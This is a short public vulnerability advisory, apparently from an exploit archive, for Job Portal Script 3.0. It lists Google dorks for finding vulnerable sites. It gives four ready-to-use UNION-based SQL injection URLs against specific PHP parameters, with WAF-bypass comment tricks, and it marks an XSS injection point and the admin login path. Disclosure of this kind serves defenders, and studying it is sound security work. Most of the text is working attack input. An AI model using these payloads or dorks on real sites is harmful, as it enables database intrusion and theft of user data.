Job Portal Script 3.0 Cross Site Scripting / SQL Injection

Job Portal Script version 3.0 suffers from cross site scripting and remote SQL injection vulnerabilities.


MD5 | 5e106dbc1dc1c27ed0a3809e60a21c5b

################################################
#Title: Job portal Script v3.0 - SQL Injection / Cross Site Scripting
#Credit: Bilal KARDADOU
#Vendor: www.jobportalscript.com
#Vendor URL: http://www.jobportalscript.com/index.html
#Product: Job portal site.
#Google Dork: categorysearch.php?indus=
# placementpaper.php?pn= ...
################################################
#
# Product & Service Introduction:
# Job site script is an advanced PHP job script to run your Job portal
site.
# It is a complete script with advance features.#
#
#
#
# --SQL Injection/Exploit--
#
#
localhost/categorysearch.php?indus=A'+/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6--
-
# localhost/placementpaper.php?pn=11'
/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,version(),6,7,8,9,10,11,12,13-- -
#
localhost/placement_new.php?type=-2%27%20/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6,7,8--%20-
# localhost/training_question.php?cate_id=-3
/*!50000UNION*/+/*!50000SELECT*/+1,2,3,version(),5,6,7-- -
#
# Bypassing WAF with Special Characters...
# ---PoC---
# http://prnt.sc/ehag7j
# http://prnt.sc/ehagg6
# http://prnt.sc/ehagsv
# http://prnt.sc/ehah1p
#
# --(XSS)Cross Site Scripting--
# localhost/categorysearch.php?indus=A[XSS]
# http://prnt.sc/ehaj87
#
# --Panel--
#
# admin/login.php
# Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127)
################################################

--
*Bilal Kardadou*
IT Security Consultant
*E* : [email protected] | *E* : [email protected] |

Related Posts